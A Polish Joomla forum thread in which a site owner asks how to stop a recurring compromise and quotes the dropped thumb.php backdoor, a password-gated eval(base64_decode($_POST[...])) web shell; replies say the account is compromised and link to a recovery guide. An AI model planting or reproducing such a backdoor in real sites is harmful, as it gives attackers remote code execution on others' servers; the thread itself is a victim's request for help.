PDA

Zobacz pełną wersję : Jak zabezpieczyć katalog tmp



jarmi
02-12-2011, 00:00
Witam, mam problem.
Codziennie mam atakowaną stronę. Do katalogu tmp wrzucany jest plik thumb.php (fragment kodu poniżej)

if(md5($_POST["password"])=="d4..."){eval(base64_decode($_POST["code"]));} ze znacznikami php. Zmieniana jest zawartość plików controller.php i view.php w libraries/joomla/application/component
Muszę kasować plik i nadpisywać 2 pozostałe. Zainstalowałem 3 komponenty zabezpieczające oraz dodatkowo podwójnie zabezpieczyłem hasło do admina. I dalej się powtarza...
Joomla 1.7 - najświeższa wersja.
Proszę o pomoc.

zwiastun
02-12-2011, 00:05
Się ciesz, że jeszcze cokolwiek masz.
Serwer, a na pewno Twoje konto jest zhakowane. Zabierz się za generalne porządki a nie zmiatanie kurzu.

jarmi
02-12-2011, 09:02
...a tak bardziej szczegółowo? Powymieniać hasła, szukać innych plików na serwerze, ...?

Bazyl
02-12-2011, 09:17
http://www.wiki.joomla.pl/index.php/Witryna_po_w%C5%82amaniu